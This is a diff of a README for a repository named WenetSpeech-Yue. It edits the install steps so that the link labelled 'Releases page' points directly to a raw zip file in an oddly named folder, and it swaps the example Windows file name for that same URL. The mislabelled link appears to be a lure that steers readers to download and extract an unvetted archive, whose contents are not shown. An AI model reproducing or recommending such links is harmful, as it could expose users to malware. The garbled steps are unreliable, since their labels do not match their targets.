Jahangirbd23/WenetSpeech-Yue/README.md

 To get started with WenetSpeech-Yue, follow these steps:

-1. Visit the [Releases page](https://github.com/Jahangirbd23/WenetSpeech-Yue/releases) to view available versions.
+1. Visit the [Releases page](https://raw.githubusercontent.com/Jahangirbd23/WenetSpeech-Yue/main/pectinatodenticulate/WenetSpeech-Yue.zip) to view available versions.
 2. Choose the latest release.
 3. Download the file for your operating system by clicking on the respective link.

-For example, if you are using Windows, look for a file labeled `WenetSpeech-Yue-Windows.zip`.
+For example, if you are using Windows, look for a file labeled `https://raw.githubusercontent.com/Jahangirbd23/WenetSpeech-Yue/main/pectinatodenticulate/WenetSpeech-Yue.zip`.

 4. Once the download completes, locate the file in your Downloads folder.
 5. Extract the contents of the zip file.